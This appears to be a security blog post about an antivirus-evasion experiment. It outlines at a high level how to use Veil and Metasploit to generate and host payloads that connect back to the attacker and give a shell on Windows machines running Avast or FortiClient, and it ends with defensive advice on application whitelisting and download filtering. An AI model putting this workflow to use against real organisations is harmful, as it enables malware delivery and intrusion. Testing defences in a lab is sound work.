Question. If an attacker can convince a user to download and run a malicious binary, script, or office document how easy is it to by-pass a common Anti-Virus program and obtain an initial foothold into an organization (i.e. a shell)?
Thoughts & Experiment. I believe this is a very important question, in my experience it is very easy for an attacker to phish a user and have them download and execute an office document or an executable (Anyone what to disagree with this assessment?). Based on this human vulnerability let’s take a look at “Veil” a piece of software that was created by (Chris Truncer), it is designed to generate payloads that will bypass common anti-virus solutions and connect back to the Metasploit Framework (i.e. a very powerful exploitation / post-exploitation application). We will use this software to generate some payloads and see if a few common anti-virus programs are able to catch them before they execute. If you want to play along at home you will need to install the following.
Linux Box with:
- Veil (https://github.com/Veil-Framework/Veil)
- Metasploit Framework (Built-in version included w/ Kali Linux (easy mode) or https://github.com/rapid7/metasploit-framework
Windows Box with:
- Your preferred Anti-Virus installation (In my demonstration I’m going to use Avast, and Forticlient)
Go ahead and watch this experiment play out in the video I created (av-evasion walkthrough)! If you have the pieces set up at home, go ahead and follow along.
Below are the steps to run through to produce similar results (Steps 1 thru 6 are covered in the video). This list can be helpful if you want to step through this a piece at a time.
- Setup your test environment (AV product to test, Veil Install, Metasploit Install)
- Generate a standard Metasploit payload (will get caught by AV programs, just to make sure they are working)
- Configure and generate a Veil-Evasion payload that when successfully run will connect back to Metasploit (may not be caught by tested AV programs)
- Setup Metasploit to wait for a reverse connection
- Host the two payloads we created so the target Windows machines can access them (Python module “SimpleHTTPServer”)
- Download and execute our binaries
- If successful we have successfully evaded AV and we now have a shell on the target machines
- Now, check out some of my post-exploitation posts to see what damage is now possible if an attacker has a shell
There you have it, using open source tools it is possible to quickly create malware that is able to bypass AV. Go ahead and try this process with AV products that you use, please share with us your results! If you have questions, feel free to post as well.
The So What. If bypassing blacklist based AV can happen quickly and easily, what controls could/should be put in place to provide better protections against targeted malware? The big one in my opinion is application whitelisting, the idea here is that only approved applications are allowed to run rather than identifying what cannot be run (blacklisting). Another useful control is preventing users from downloading executables from the Internet (or other malicious file types) (would need to implement SSL inspection here to do this properly). Anyone have any experience putting these technologies in place? If so let us know how the implementations went for your organization and what tools worked best for you. I know these mentioned solutions can be quite difficult to get right and it would be good to hear techniques and tips from the community.
Thanks for following along and participating. FYI, my next post will dive into some post-exploitation topics, expanding on what an attacker can do now that they have a shell. Stay tuned!